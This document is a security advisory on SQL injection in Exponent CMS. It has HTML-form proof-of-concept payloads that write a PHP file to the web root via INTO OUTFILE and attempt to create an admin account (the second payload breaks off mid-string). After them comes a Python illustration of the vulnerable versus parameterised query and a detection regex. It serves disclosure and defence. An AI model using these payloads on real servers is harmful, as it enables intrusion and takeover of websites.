SQL Injection in Exponent CMS
The vulnerability exists due to insufficient filtering of the "src" and "username" HTTP GET parameters passed to the "/index.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in the application's database.

Depending on the database and system configuration, the PoC (Proof-of-Concept) code below will create a "/var/www/file.php" file containing the PHP function 'phpinfo()':

<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="hidden" name="username" value="' UNION SELECT '<? phpinfo(); ?>' INTO OUTFILE '/var/www/file.php' -- ">
<input type="submit" id="btn">
</form>

The second PoC will attempt to create a new administrative user with username "hacker" and password "hacker":

<form action="http://[host]/index.php" method="post" name="main">
<input type="hidden" name="action" value="login">
<input type="hidden" name="int" value="1">
<input type="hidden" name="module" value="login">
<input type="hidden" name="password" value="password">
<input type="hidden" name="src" value="' UNION SELECT 'INSERT INTO users (username, password, is_admin) VALUES ("hacker""
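The defect behind both PoCs is a login query that splices the "username" parameter into SQL text. The example below is added here and is not the advisory's or Exponent CMS's code: it models that query against a constructed in-memory SQLite table (column names borrowed from the second PoC, not Exponent's real schema), shows the parameterised form that neutralises the same payload, and adds a detection heuristic keyed to the payload shape used above. Function names (make_db, find_user_unsafe, find_user_safe, looks_like_sqli) are hypothetical.

```python
import re
import sqlite3

# Constructed stand-in for a CMS users table in an in-memory SQLite database.
# Column names follow the advisory's second PoC; this is not Exponent's real schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.execute("INSERT INTO users VALUES ('alice', 'secret', 0)")
    conn.commit()
    return conn

def find_user_unsafe(conn, username):
    # The defect the advisory describes: the parameter is spliced into the SQL text,
    # so a quote in it closes the literal and the remainder is parsed as SQL.
    sql = "SELECT username FROM users WHERE username = '%s'" % username
    return [row[0] for row in conn.execute(sql)]

def find_user_safe(conn, username):
    # The fix: bind the value through a placeholder; it is only ever data.
    sql = "SELECT username FROM users WHERE username = ?"
    return [row[0] for row in conn.execute(sql, (username,))]

# Detection heuristic for logging/alerting on request parameters, keyed to the
# payload shape in the advisory (UNION SELECT, INTO OUTFILE, quote then comment).
# It is a monitoring aid, not a substitute for parameterised queries.
INJECTION_RE = re.compile(r"\bunion\s+select\b|\binto\s+outfile\b|'\s*--", re.IGNORECASE)

def looks_like_sqli(value):
    return INJECTION_RE.search(value) is not None

# Constructed payload with the same structure as the advisory's "username" value
# (the INTO OUTFILE clause is omitted because SQLite has no such statement).
PAYLOAD = "' UNION SELECT 'injected' -- "

if __name__ == "__main__":
    db = make_db()
    print("unsafe:", find_user_unsafe(db, PAYLOAD))   # ['injected']
    print("safe:  ", find_user_safe(db, PAYLOAD))     # []
    print("flagged:", looks_like_sqli(PAYLOAD))       # True
```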